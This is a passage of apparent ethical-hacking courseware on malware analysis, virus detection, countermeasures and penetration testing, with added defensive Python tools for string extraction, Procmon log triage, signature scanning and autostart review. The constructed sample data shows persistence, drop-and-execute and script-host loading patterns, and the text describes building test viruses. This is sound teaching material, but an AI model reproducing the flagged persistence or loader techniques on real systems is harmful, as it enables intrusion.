    UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net
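Steps 1 and 2 above (string extraction with BinText, packer identification before running UPX) can be scripted for a first pass over a sample. The block below is an added example written for this page; it is not code from the course material or from the BinText or UPX authors. It pulls ASCII and UTF-16LE strings out of a byte buffer the way BinText's two string kinds work, checks for the section names stock UPX leaves behind, and flags a few keywords. The SAMPLE bytes (not a real executable), the INTERESTING keyword list and the function names are assumptions made for the example.

```python
"""Static triage of a Windows binary: the two kinds of strings BinText reports
(plain ASCII and UTF-16LE 'Unicode') plus a check for UPX packer markers.
Added example; not from the course material. Sample bytes are constructed."""
import re
from typing import Dict, List, Tuple

MIN_LEN = 5  # shortest run of printable characters reported as a string

# Constructed stand-in for an executable. It is NOT a real PE file; it only
# carries the byte patterns the functions below look for.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"UPX0\x00\x00\x00\x00UPX1\x00\x00\x00\x00"          # UPX section names
    + b"\x01\x02\x03kernel32.dll\x00CreateRemoteThread\x00\x00"
    + "http://update.example.invalid/x".encode("utf-16-le") + b"\x00\x00"
    + b"ab\x00"                                              # too short to report
    + b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
)


def ascii_strings(data: bytes, min_len: int = MIN_LEN) -> List[Tuple[int, str]]:
    """(offset, text) for every run of at least min_len printable ASCII bytes."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pat.finditer(data)]


def unicode_strings(data: bytes, min_len: int = MIN_LEN) -> List[Tuple[int, str]]:
    """(offset, text) for runs of at least min_len UTF-16LE code units whose
    value is printable ASCII, i.e. byte patterns of the form A,0,B,0,C,0,..."""
    pat = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [(m.start(), m.group().decode("utf-16-le")) for m in pat.finditer(data)]


UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")


def upx_markers(data: bytes) -> List[str]:
    """Section names and signature that stock UPX leaves in a packed file.
    Absence proves nothing (sections can be renamed, other packers exist);
    presence means the file should be unpacked (upx -d) before its strings
    say anything about the real payload."""
    return [m.decode("ascii") for m in UPX_MARKERS if m in data]


# Constructed triage keywords; a real list is much longer.
INTERESTING = ("CreateRemoteThread", "CurrentVersion\\Run", "http://", "https://")


def triage(data: bytes) -> Dict[str, object]:
    """Summarise what a first static pass should report for the sample."""
    found = [s for _, s in ascii_strings(data)] + [s for _, s in unicode_strings(data)]
    return {
        "packed_with_upx": bool(upx_markers(data)),
        "upx_markers": upx_markers(data),
        "ascii_count": len(ascii_strings(data)),
        "unicode_count": len(unicode_strings(data)),
        "interesting": [s for s in found if any(k in s for k in INTERESTING)],
    }


if __name__ == "__main__":
    for key, val in triage(SAMPLE).items():
        print(f"{key}: {val}")
```

On the constructed sample the report says the file carries UPX0/UPX1 markers, three ASCII strings and one UTF-16LE string, and lists the injection API name, the autostart registry path and the URL as interesting. For a real packed file the string pass is repeated after unpacking, since the packed payload yields almost nothing.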
  • 80. Malware Analysis Procedure (Cont'd)
Step 3: Set up the network connection and check that it is not giving any errors.
Step 4: Run the virus and monitor the process actions and system information with the help of process monitoring tools such as Process Monitor and Process Explorer.
Process Monitor
Source: http://technet.microsoft.com
Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, registry, and process/thread activity.
  • 81. FIGURE 7.28: Process Monitor Screenshot. The capture ("Showing 89,723 of 186,768 events (48%)") lists, per event, Time of Day, Process Name, PID, Operation, Path, Result and Detail, for example:
    12:13:46.620  Explorer.EXE  2384  CreateFileMapping  C:\Windows\System32\imageres.dll          SUCCESS  SyncType: SyncTy...
    12:13:46.620  Explorer.EXE  2384  CloseFile          C:\Windows\System32\imageres.dll          SUCCESS
    12:13:46.621  Explorer.EXE  2384  CreateFile         C:\Users\Administrator\AppData\Local\...   SUCCESS  Desired Access: S...
    12:13:46.676  mmc.exe       4100  ReadFile           C:\Windows\Microsoft.NET\Framework\...     SUCCESS  Offset: 7,623,168, ...
    12:13:46.685  firefox.exe   2760  TCP Receive        WIN-MSSELCK4K41:1056 -> WIN-MSS...          SUCCESS  Length: 1, seqnum: ...
    12:13:46.685  firefox.exe   2760  TCP Send           WIN-MSSELCK4K41:1055 -> WIN-MSS...          SUCCESS  Length: 1, startime: ...
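Step 4's output is easier to work through from a saved export than from the live window. The block below is an added example (mine, not code from the course or from Sysinternals): it parses a Process Monitor CSV export and groups, per process, the files written, registry values set (noting autostart locations), child processes started and network peers contacted, then reduces those to a short list of findings. The CSV rows are constructed for the example in the shape of Procmon's File > Save as CSV output; the process names, paths, the 203.0.113.7 address and the operation sets are assumptions.

```python
"""Triage of a Process Monitor CSV export: per process, which files it wrote,
which registry values it set (and whether any are autostart locations), which
processes it started and which network peers it contacted. Added example, not
course material; the CSV rows are constructed in the shape of Procmon's
File > Save... > CSV output."""
import csv
import io
from collections import defaultdict
from typing import Dict, List

PROCMON_CSV = '''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"12:13:46.620","Explorer.EXE","2384","CreateFileMapping","C:\\Windows\\System32\\imageres.dll","SUCCESS","SyncType: SyncTypeOther"
"12:13:47.101","sample.exe","5120","CreateFile","C:\\Users\\Administrator\\AppData\\Roaming\\svc.exe","SUCCESS","Desired Access: Generic Write, Disposition: OverwriteIf"
"12:13:47.102","sample.exe","5120","WriteFile","C:\\Users\\Administrator\\AppData\\Roaming\\svc.exe","SUCCESS","Offset: 0, Length: 65,536"
"12:13:47.150","sample.exe","5120","RegSetValue","HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svc","SUCCESS","Type: REG_SZ, Length: 98, Data: C:\\Users\\Administrator\\AppData\\Roaming\\svc.exe"
"12:13:47.200","sample.exe","5120","Process Create","C:\\Users\\Administrator\\AppData\\Roaming\\svc.exe","SUCCESS","PID: 5188, Command line: svc.exe"
"12:13:47.300","svc.exe","5188","TCP Connect","WIN-MSSELCK4K41:49321 -> 203.0.113.7:443","SUCCESS","Length: 0, mss: 1460, sackopt: 1"
"12:13:47.310","svc.exe","5188","TCP Send","WIN-MSSELCK4K41:49321 -> 203.0.113.7:443","SUCCESS","Length: 180, startime: 21504"
"12:13:47.400","mmc.exe","4100","ReadFile","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll","SUCCESS","Offset: 7,623,168, Length: 4,096"
'''

# Operation names as Procmon prints them; the sets are an assumption of what
# counts as "interesting" for a first pass.
WRITE_OPS = {"WriteFile", "SetRenameInformationFile", "SetDispositionInformationFile"}
REG_WRITE_OPS = {"RegSetValue", "RegCreateKey", "RegDeleteValue"}
NET_OPS = {"TCP Connect", "TCP Send", "TCP Receive", "UDP Send", "UDP Receive"}
# Registry paths whose values run at logon; compared case-insensitively.
AUTOSTART_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")


def parse_procmon(text: str) -> List[Dict[str, str]]:
    """Rows as dicts keyed by Procmon's column names."""
    return list(csv.DictReader(io.StringIO(text)))


def _empty() -> Dict[str, set]:
    return {"files_written": set(), "registry_set": set(), "autostart": set(),
            "children": set(), "peers": set()}


def summarise(rows: List[Dict[str, str]]) -> Dict[str, Dict[str, List[str]]]:
    """Group successful events by 'name:pid'; processes with no event of
    interest (pure reads, section mappings) are left out."""
    per = defaultdict(_empty)
    for r in rows:
        if r["Result"] != "SUCCESS":
            continue
        key = f'{r["Process Name"]}:{r["PID"]}'
        op, path = r["Operation"], r["Path"]
        if op in WRITE_OPS:
            per[key]["files_written"].add(path)
        elif op in REG_WRITE_OPS:
            per[key]["registry_set"].add(path)
            if any(k in path.lower() for k in AUTOSTART_KEYS):
                per[key]["autostart"].add(path)
        elif op == "Process Create":
            per[key]["children"].add(path)
        elif op in NET_OPS:
            # Path looks like 'host:port -> peerhost:port'; keep the peer side.
            per[key]["peers"].add(path.split("->")[-1].strip())
    return {k: {f: sorted(v) for f, v in d.items()} for k, d in per.items()}


def findings(summary: Dict[str, Dict[str, List[str]]]) -> List[str]:
    """Human-readable conclusions: persistence, drop-and-execute, network."""
    out = []
    for proc, d in summary.items():
        for path in d["autostart"]:
            out.append(f"{proc} sets autostart value {path}")
        for path in sorted(set(d["files_written"]) & set(d["children"])):
            out.append(f"{proc} drops and executes {path}")
        if d["peers"]:
            out.append(f"{proc} contacts {', '.join(d['peers'])}")
    return out


if __name__ == "__main__":
    for line in findings(summarise(parse_procmon(PROCMON_CSV))):
        print(line)
```

Explorer.EXE and mmc.exe only map and read files, so they drop out of the summary; the constructed sample.exe rows produce a persistence finding and a drop-and-execute finding, and its child produces a network finding. The same grouping works on a real export, where the filter on the sample's process in step 4 keeps the row count manageable.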
  • 82. Malware Analysis Procedure (Cont'd)
Step 5: Record network traffic information using connectivity and log packet content monitoring tools such as NetResident and TCPView.
Step 6: Determine the files added, processes spawned, and changes to the registry with the help of registry monitoring tools such as RegShot.
NetResident
Source: http://www.tamos.com
NetResident is a network content analysis application designed to monitor, store, and reconstruct a wide range of network events and activities, such as email messages, web pages, downloaded files, instant messages, and VoIP conversations. It uses advanced monitoring technology to capture the data on the network, saves the data to a database, reconstructs it, and displays the content.
  • 83. FIGURE 7.29: NetResident Screenshot. The capture (NetResident - Evaluation Version) lists Web events dated 10/5/2012 between Party A (WIN-LXQN3..., ports 1076 to 1205) and Party B (maa03s04-in..., mystart-ton.i...) on ports 80 and 443; the Event Detail pane shows a POST request to http://news.google.co.in/news/xhr/rhc?authuser=0 (180 bytes) with a "cid" tag value.
  • 84. Malware Analysis Procedure (Cont'd)
Step 7: Collect the following information using debugging tools such as OllyDbg and ProcDump:
- Service requests
- Attempts for incoming and outgoing connections
- DNS tables information
OllyDbg
Source: http://www.ollydbg.de
OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft Windows. Its emphasis on binary code analysis makes it particularly useful in cases where source is unavailable.
  • 85. FIGURE 7.30: OllyDbg Screenshot (the CPU window of the main thread of module OLLYDBG, with the disassembly, registers, and stack panes).
  • 86. Virus Analysis Tool: IDA Pro
Source: http://www.hex-rays.com
IDA Pro is a disassembler and debugger tool that supports both Windows and Linux platforms.
Disassembler
The disassembler displays the instruction execution of various programs in symbolic form, even if the code is available only in binary form. It displays the instruction execution of the processor in the form of maps. It enables its users to identify viruses as well. For example, if any screensavers or "gif" files are trying to spy on any internal applications of the user, IDA Pro reveals this immediately. IDA Pro is developed with the latest techniques that enable it to trace difficult binary code, which is displayed in readable execution maps.
Debugger
The debugger is an interactive tool that complements the disassembler to perform the task of static analysis in one single step. It bypasses the obfuscation process, which helps the disassembler process the hostile code in depth.
  • 87. IDA Pro is a tool that allows you to explore software interruptions and vulnerabilities and to use it for tamper resistance. It is an interactive, programmable, multi-processor disassembler coupled to a local and remote debugger and augmented by a complete plugin programming environment. It can also be used to protect your essential privacy rights. It is used by antivirus companies, research companies, software development companies, agencies, and military organizations.
Screenshot: IDA - C:\Program Files (x86)\IDA Demo 6.3\qwingraph.exe, showing the Functions window (sub_401070, sub_401200, ...), the IDA View-A disassembly of WinMain (calls to GetCommandLineW, QString::fromWCharArray and QString::toLocal8Bit), and the Output window reporting "IDA is analysing the input file... Using FLIRT signature: Microsoft VisualC 2-10/net runtime".
  • 88. Online Malware Testing: VirusTotal
Source: http://www.virustotal.com
VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, Trojans, and all kinds of malware detected by antivirus engines.
Features:
- Free and independent service
- Uses multiple antivirus engines
- Comprised of real-time automatic updates of virus signatures
- Gives detailed results from each antivirus engine
- Has real-time global statistics
  • 89. FIGURE 7.32: VirusTotal Screenshot (the analysis report for an uploaded sample, listing per-engine results such as AhnLab-V3, AntiVir, Antiy-AVL, Avast and AVG with their detection names and signature dates of 2012-07-16/17).
  • 90. Online Malware Analysis Services
Online malware analysis services allow you to scan files and resources and secure them before attackers attack and compromise them. A few online malware analysis services are listed as follows:
- Anubis: Analyzing Unknown Binaries, available at http://anubis.iseclab.org
- Avast! Online Scanner, available at http://onlinescan.avast.com
- Malware Protection Center, available at https://www.microsoft.com
- ThreatExpert, available at http://www.threatexpert.com
- Dr. Web Online Scanners, available at http://vms.drweb.com
- Metascan Online, available at http://www.metascan-online.com
- Bitdefender QuickScan, available at http://www.bitdefender.com
- GFI SandBox, available at http://www.gfi.com
- UploadMalware.com, available at http://www.uploadmalware.com
- Fortinet, available at http://www.fortiguard.com
  • 91. Module Flow
So far, we have discussed various viruses and worms and malware analysis. Now we will discuss the countermeasures to be applied to protect against viruses and worms, if any are found. These countermeasures help in enhancing security.
- Virus and Worms Concept
- Types of Viruses
- Computer Worms
- Malware Analysis
- Countermeasures
- Penetration Testing
This section highlights various virus and worm countermeasures.
  • 92. Virus Detection Methods
Scanning: Once a virus has been detected, it is possible to write scanning programs that look for signature string characteristics of the virus.
Integrity Checking: Integrity checking products work by reading the entire disk and recording integrity data that acts as a signature for the files and system sectors.
Interception: The interceptor monitors the operating system requests that are written to the disk.
A virus scanner is an important piece of software that one should have installed on the PC. If there is no scanner, there is a high chance that the system can be hit by and suffer from a virus. A virus protector should be run regularly on the PC, and the scan engine and virus signature database have to be updated often. Antivirus software is of no use if it does not know what to look for in the latest virus. One should always remember that an antivirus program cannot stop everything. The rule of thumb is that if an email looks suspicious, e.g., if one is not expecting an email from the sender or does not know the sender, or if the header looks like something that a known sender would not normally say, one must be careful about opening the email, as there might be a risk of becoming infected by a virus. The MyDoom and W32.Novarg.A@mm worms infected many Internet users recently. These worms infected most users through email. The three best methods for antivirus detection are:
- Scanning
- Integrity checking
- Interception
In addition, a combination of some of these techniques can be more effective.
  • 93. Scanning
- The moment a virus is detected in the wild, antivirus vendors across the globe start writing scanning programs that look for its signature strings (characteristic of the virus).
- The strings are identified and extracted from the virus by these scanner writers. The resulting new scanners search memory, files, and system sectors for the signature strings of the new virus. The scanner declares the presence of a virus once it finds a match. Only known and pre-defined viruses can be detected.
- Virus writers often create many new viruses by altering an existing one. What looks like a new virus may have taken just a few minutes to create. Attackers make these changes frequently to throw off the scanners.
- In addition to signature recognition, new scanners make use of various other detection techniques such as code analysis. Before looking into the code characteristics of a virus, the scanner examines the code at various locations in an executable file.
- In another possibility, the scanner sets up a virtual computer in RAM and tests the programs by executing them in the virtual space. This technique, called "heuristic scanning," can also check and remove messages that might contain a computer virus or other unwanted content.
- The major advantages of scanners are:
  - They can check programs before they are executed.
  - It is the easiest way to check new software for any known or malicious virus.
- The major drawbacks of scanners are:
  - Old scanners could prove to be unreliable. With the tremendous increase in new viruses, old scanners can quickly become obsolete. It is best to use the latest scanners available on the market.
  - Even a new scanner is never equipped to handle all new challenges, since viruses appear more rapidly than new scanners can be developed to battle them.
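The scanning method above, as an added example that is not part of the course material: a small signature scanner over byte buffers and files. Signatures are hex byte strings in which "??" stands for one arbitrary byte, the wildcard notation several scanner signature formats use; the signature database, the three sample buffers and the function names are constructed for the example. Scanning the altered variant with and without the wildcard shows concretely why the "altering an existing virus" point above defeats exact-string signatures, and the file scanner carries bytes across chunk boundaries so a match that straddles two reads is not missed.

```python
"""Signature scanning: byte patterns extracted from a known sample are searched
for in files or memory dumps. Added example, not course material; signatures
and samples are constructed. '??' in a signature matches any one byte."""
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Constructed signature database: name -> hex bytes, '??' = any one byte.
SIGNATURES: Dict[str, str] = {
    # The 4 operand bytes are wildcarded so that a re-assembled variant with a
    # different displacement still matches.
    "Constructed.Demo.A": "E8 ?? ?? ?? ?? 5B 81 EB",
    "Constructed.Demo.B": "48 65 6C 6C 6F 2C 20 57 4F 52 4D",   # "Hello, WORM"
}
# The same pattern without wildcards, to show what a one-byte edit does to it.
EXACT_ONLY: Dict[str, str] = {"Constructed.Demo.A.exact": "E8 00 00 00 00 5B 81 EB"}

# Constructed "files": a known sample, a variant with one operand byte altered,
# and a clean buffer.
ORIGINAL = b"\x90" * 16 + bytes.fromhex("E8 00 00 00 00 5B 81 EB 05 10 40 00") + b"\x00" * 8
VARIANT = b"\x90" * 16 + bytes.fromhex("E8 07 00 00 00 5B 81 EB 05 10 40 00") + b"\x00" * 8
CLEAN = b"This buffer carries no signature bytes at all." * 2


def compile_signature(spec: str) -> "re.Pattern":
    """Turn 'E8 ?? 5B' into a bytes regex; DOTALL lets '.' match 0x0A too."""
    parts = spec.split()
    regex = b"".join(b"." if p == "??" else re.escape(bytes([int(p, 16)])) for p in parts)
    return re.compile(regex, re.DOTALL)


def scan(data: bytes, sigs: Dict[str, str] = SIGNATURES) -> List[Tuple[str, int]]:
    """Every (signature name, offset) match inside one buffer: a file read into
    memory, or a process memory dump."""
    hits = []
    for name, spec in sigs.items():
        hits.extend((name, m.start()) for m in compile_signature(spec).finditer(data))
    return sorted(hits)


def scan_file(path: str, sigs: Dict[str, str] = SIGNATURES,
              chunk_size: int = 1 << 20) -> List[Tuple[str, int]]:
    """Stream a file in chunks, carrying the last (longest signature - 1) bytes
    over so that a match straddling a chunk boundary is still found. Matches
    seen in two consecutive windows are de-duplicated by the set."""
    compiled = {n: compile_signature(s) for n, s in sigs.items()}
    overlap = max(len(s.split()) for s in sigs.values()) - 1
    hits, offset, tail = set(), 0, b""
    with open(path, "rb") as fh:
        while True:
            block = fh.read(chunk_size)
            if not block:
                break
            buf = tail + block
            base = offset - len(tail)          # file offset of buf[0]
            for name, rx in compiled.items():
                hits.update((name, base + m.start()) for m in rx.finditer(buf))
            offset += len(block)
            tail = buf[-overlap:] if overlap else b""
    return sorted(hits)


def demo_file_scan(chunk_size: int = 8) -> List[Tuple[str, int]]:
    """Write ORIGINAL to a temp file and scan it with a tiny chunk size so the
    chunk-boundary handling is actually exercised."""
    fd, path = tempfile.mkstemp(suffix=".bin")
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(ORIGINAL)
        return scan_file(path, chunk_size=chunk_size)
    finally:
        os.remove(path)


if __name__ == "__main__":
    print("original, wildcard sig :", scan(ORIGINAL))
    print("variant,  wildcard sig :", scan(VARIANT))
    print("variant,  exact sig    :", scan(VARIANT, EXACT_ONLY))
    print("file scan, 8-byte reads:", demo_file_scan())
```

The wildcard signature finds both the original and the variant at offset 16; the exact signature finds only the original, which is the gap a scanner closes by re-extracting strings from each new variant or by masking the bytes a variant is likely to change.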
In te g rity C h e c k in g 0 Integrity checking products perform their functions by reading and recording integrated data to develop a signature or base line for those files and system sectors. Q Integrity products check any program with built-in intelligence. This is really the only solution that can take care of all the threats to data. The most trusted way to know the amount of damage done by a virus is provided by these integrity checkers, since they can check data against the originally established base line. Module 07 Page 1098 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 94. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker Q A disadvantage of a basic integrity checker is that it cannot differentiate file corruption caused by a bug from corruption caused by a virus. Q However, there are some advanced integrity checkers available that are capable of analyzing and identifying the types of changes that viruses make. A few integrity checkers combine some of the antivirus techniques with integrity checking to create a hybrid. This also simplifies the virus checking process. In te rc e p tio n 0 The main use of an interceptor is for deflecting logic bombs and Trojans. Q The interceptor controls requests to the operating system for network access or actions that cause a threat to the program. If it finds such a request, the interceptor generally pops up and asks if the user wants to allow the request to continue. There are no dependable ways to intercept direct branches to low-level code or direct instructions for input and output instructions by the virus. In some cases, the virus is capable of disabling the monitoring program itself. Some years back it took only eight bytes of code for a widely used antivirus program to turn off its monitoring functions. Module 07 Page 1099 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
• 95. Virus and Worms Countermeasures
Preventive measures need to be followed in order to lessen the possibility of virus infection and data loss. If certain rules and actions are adhered to, the possibility of falling victim to a virus can be minimized. Some of these methods include:
- Install antivirus software that detects and removes infections as they appear
- Generate an antivirus policy for safe computing and distribute it to the staff
- Pay attention to the instructions while downloading files or programs from the Internet
- Update the antivirus software regularly, ideally automatically as new signatures are released, so that it can identify and clean out new threats
- Avoid opening attachments received from an unknown sender, as viruses spread via email attachments
- A virus infection may corrupt data, so maintain regular data backups
- Schedule regular scans of all drives after installing the antivirus software
- Do not accept disks or programs without first checking them with a current version of an antivirus program
Module 07 Page 1100
• 96. Virus and Worms Countermeasures (Cont'd)
- Ensure that executable code sent to the organization is approved
- Run disk cleanup, a registry scanner, and defragmentation once a week
- Do not boot the machine from an infected bootable system disk
- Turn on the firewall built into the operating system (Windows XP and later include one)
- Keep informed about the latest virus threats
- Run an anti-spyware/adware scan once a week
- Check DVDs and CDs for virus infection before use
- Block files with more than one file type extension (for example, a name ending in .pdf.exe)
- Ensure the pop-up blocker is turned on and use an Internet firewall
- Be cautious with files sent through instant messengers
Module 07 Page 1101
• 97. Companion Antivirus: Immunet
Source: http://www.immunet.com
"Companion antivirus" means that Immunet is compatible with existing antivirus solutions: it adds an extra, lightweight layer of protection on top of whatever is already installed. According to the vendor, traditional antivirus solutions detect on average only 50% of online threats, leaving most users under-protected, which is why every PC can benefit from Immunet's additional layer of security. Immunet Protect's detection relies on two engines, ETHOS (heuristics-based) and SPERO (cloud-based). Users of the Plus version also benefit from a third engine, TETRA, which provides protection when the machine is not connected to the Internet.
Module 07 Page 1102
• 98. FIGURE 7.33: Immunet Screenshot
Module 07 Page 1103
• 99. Antivirus Tools
Antivirus tools prevent, detect, and remove viruses and other malicious code from your system. They scan incoming and outgoing email messages and instant messenger attachments, repair or quarantine infected files, and many also monitor network traffic for malicious activity. A few antivirus tools that can be used to detect and remove viruses are listed below:
- AVG Antivirus available at http://free.avg.com
- BitDefender available at http://www.bitdefender.com
- Kaspersky Anti-Virus available at http://www.kaspersky.com
- Trend Micro Internet Security Pro available at http://apac.trendmicro.com
- Norton AntiVirus available at http://www.symantec.com
- F-Secure Anti-Virus available at http://www.f-secure.com
- Avast Pro Antivirus available at http://www.avast.com
- McAfee AntiVirus Plus 2013 available at http://home.mcafee.com
- ESET Smart Security 6 available at http://www.eset.com
- Total Defense Internet Security Suite available at http://www.totaldefense.com
Module 07 Page 1104
• 100. Module Flow
Virus and Worms Concept | Types of Viruses | Computer Worms | Malware Analysis | Countermeasures | Penetration Testing
Penetration testing must be conducted against viruses and worms, as they are among the most widely used means of attack and do not require extensive knowledge to use. Hence, you should conduct a pen test on your own system or network before a real attacker exploits it. This section provides insight into virus and worm pen testing.
Module 07 Page 1105
• 101. Penetration Testing for Viruses
- Install an antivirus program on the network infrastructure and on the end users' systems
- Update the antivirus software so that its virus database covers newly identified viruses
- Scan the system for viruses, which helps to repair damage or delete files infected with viruses

Since you are an expert ethical hacker and penetration tester, the IT director instructs you to test the network for any viruses and worms that could damage or steal the organization's information. You need to construct viruses and worms, try to inject them into a dummy network (virtual machines isolated from production), and check whether they are detected by the antivirus programs or are able to bypass the network firewall. As a pen tester, you should carry out the following steps to conduct a virus penetration test:
Step 1: Install an antivirus program
Install an antivirus program on the network infrastructure and on the end users' systems before conducting the penetration test.
Step 2: Update the antivirus software
Check whether your antivirus is up to date. If not, update it.
Step 3: Scan the system for viruses
Scan your target system; this will help you repair damage or delete files infected with viruses.
Module 07 Page 1106
• 102. Penetration Testing for Viruses (Cont'd)
Step 4: Set the antivirus to quarantine or delete the virus
Set your antivirus software to compare file contents with the known computer virus signatures, identify infected files, quarantine and repair them if possible, or delete them if not. If the virus is removed, the system is safe; if it is not, continue with the next step.
Step 5: Go to safe mode and delete the infected file manually
If the virus is not removed, boot into safe mode and delete the infected file manually.
Module 07 Page 1107
• 103. Penetration Testing for Viruses (Cont'd)
- Scan the system for running processes, registry entries, startup programs, services, and file and folder integrity
- If any suspicious process, registry entry, startup program, or service is discovered, check the associated executable files; collect more information about them from the publisher's website, if available, and from the Internet
- Check the startup programs and determine whether every program in the list can be recognized and has a known function
- Check data files for modification or manipulation by opening several files and comparing their hash values with pre-computed hashes

Step 6: Scan the system for running processes
Scan your system for suspicious running processes, using tools such as What's Running, Winsonar, and HijackThis.
Step 7: Scan the system for suspicious registry entries
Scan your system for suspicious registry entries, using tools such as jv16 PowerTools 2012, Reg Organizer, and RegShot.
Step 8: Scan the system for Windows services
Scan for suspicious Windows services running on your system, using tools such as SrvMan and ServiWin.
Step 9: Scan the system for startup programs
Scan your system for suspicious startup programs. Tools such as Starter, Security AutoRun, and Autoruns can be used to list and review them.
Step 10: Scan the system for file and folder integrity
Scan your system for file and folder integrity, using tools such as FCIV, Tripwire, and sigverif.
Module 07 Page 1108
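Steps 6 to 9 come down to listing every process, service, and autostart entry and asking whether each one is recognized and runs from where it should. As an added example that is not courseware code and not part of any of the tools named above, here is a Python triage pass over a constructed list of autostart entries shaped like an Autoruns-style export (entry location, name, image path, launch string, signer, verified flag). The entry list, the field names, and the heuristics are assumptions for this example; it flags the entries a reviewer should look up on the publisher's site and hash-check, rather than deciding that they are malicious.

```python
"""Added example: triage of autostart/service entries (not courseware code).

Each entry is a dict modelled on what Autoruns / ServiWin style tools export.
The rules flag entries worth a closer look; none of them proves malware.
"""
from __future__ import annotations

import ntpath  # Windows path semantics, usable on any OS

# Binaries that only ever live under the Windows system directories. A file
# with one of these names anywhere else is a classic masquerade.
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe",
                   "winlogon.exe", "smss.exe", "wininit.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Locations an unprivileged user (and therefore a dropper) can write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\",
                 "c:\\users\\public\\", "c:\\programdata\\")
# Script hosts and LOLBins that turn a harmless-looking entry into code execution.
SCRIPT_HOSTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "powershell.exe", "cmd.exe"}


def _norm(p: str) -> str:
    """Lower-case, backslash-normalised Windows path."""
    return ntpath.normcase(p)


def triage_entry(entry: dict) -> list[str]:
    """Return the reasons an entry deserves manual follow-up (empty = unremarkable)."""
    reasons = []
    image = _norm(entry.get("image_path", ""))
    launch = _norm(entry.get("launch_string", ""))
    name = ntpath.basename(image)

    if not entry.get("verified", False):
        reasons.append("image is not signed by a verified publisher")
    if name in SYSTEM_BINARIES and not image.startswith(SYSTEM_DIRS):
        reasons.append(f"{name} is a Windows system binary but runs from {image}")
    if any(marker in image for marker in USER_WRITABLE):
        reasons.append("image lives in a user-writable location")
    # Two extensions ("invoice.pdf.exe"): the countermeasure slides say block these.
    stem, ext = ntpath.splitext(name)
    if ext and ntpath.splitext(stem)[1]:
        reasons.append(f"double file extension: {name}")
    # A script host is only as trustworthy as what it is told to load.
    if name in SCRIPT_HOSTS and any(m in launch for m in USER_WRITABLE):
        reasons.append(f"{name} loads a payload from a user-writable location")
    return reasons


def triage(entries: list[dict]) -> dict[str, list[str]]:
    """Map entry name -> reasons, for every entry with at least one reason."""
    flagged = {}
    for e in entries:
        reasons = triage_entry(e)
        if reasons:
            flagged[e["entry"]] = reasons
    return flagged


# Constructed sample export (not from a real machine): two normal entries,
# a masquerading svchost.exe, a double-extension dropper, and a rundll32 loader.
SAMPLE_ENTRIES = [
    {"location": "HKLM\\System\\CurrentControlSet\\Services", "entry": "Schedule",
     "image_path": r"C:\Windows\System32\svchost.exe",
     "launch_string": r"C:\Windows\System32\svchost.exe -k netsvcs",
     "signer": "Microsoft Windows", "verified": True},
    {"location": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "entry": "Adobe ARM",
     "image_path": r"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe",
     "launch_string": r"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe",
     "signer": "Adobe Systems", "verified": True},
    {"location": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "entry": "Windows Update",
     "image_path": r"C:\Users\bob\AppData\Roaming\svchost.exe",
     "launch_string": r"C:\Users\bob\AppData\Roaming\svchost.exe",
     "signer": "", "verified": False},
    {"location": "Startup folder", "entry": "invoice.pdf.exe",
     "image_path": r"C:\Users\bob\Downloads\invoice.pdf.exe",
     "launch_string": r"C:\Users\bob\Downloads\invoice.pdf.exe",
     "signer": "", "verified": False},
    {"location": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "entry": "Loader",
     "image_path": r"C:\Windows\System32\rundll32.exe",
     "launch_string": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\x.dll,Start",
     "signer": "Microsoft Windows", "verified": True},
]

if __name__ == "__main__":
    for entry, reasons in triage(SAMPLE_ENTRIES).items():
        print(entry)
        for r in reasons:
            print("  -", r)
```

To use it on a real host, export the autostart list from Autoruns or the service list from ServiWin, map the columns onto the field names above, and feed the rows to triage(). Every flagged entry then gets the manual checks the steps call for: look up the publisher, compute the file's hash, and compare it with the vendor's published value or a known-good copy. The rundll32 case is the one that a plain "is the image signed?" check misses, because the signed Microsoft binary is only the host for a payload in %TEMP%.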
• 104. Penetration Testing for Viruses (Cont'd)
- Check critical OS files for modification or manipulation using tools such as Tripwire, or by manually comparing hash values if you have a backup copy (tools such as FCIV and Tripwire)
- Document all your findings from the previous steps; this helps in determining the next action if viruses are identified on the system
- Isolate the infected system from the network immediately to prevent further infection
- Sanitize the complete system for viruses using an updated antivirus; if it cannot clean the infection, find another antivirus solution that can

Step 11: Scan the system for critical OS modifications
Check critical OS files for modification or manipulation using tools such as Tripwire, or by manually comparing hash values against a known-good backup copy.
Step 12: Document all findings
These findings help you determine the next action if viruses are identified on the system.
Step 13: Isolate the infected system
Once an infected system is identified, isolate it from the network immediately in order to prevent further infection.
Step 14: Sanitize the complete infected system
Remove the virus infection from the system using the latest updated antivirus software; if one product cannot clean it, try another.
Module 07 Page 1109
